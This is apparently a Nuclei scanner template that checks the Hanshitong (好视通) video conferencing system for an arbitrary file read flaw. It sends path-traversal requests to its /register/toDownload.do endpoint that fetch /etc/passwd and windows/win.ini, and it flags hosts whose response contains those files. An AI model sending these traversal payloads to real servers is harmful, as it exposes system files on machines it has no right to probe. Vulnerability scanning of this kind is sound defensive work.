id: hst-fileRead

info:
  name: 好视通视频会议系统任意文件读取
  author: str1am
  severity: high
  tags: hst,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root:x"
          - "[extensions]"
        part: body
        condition: or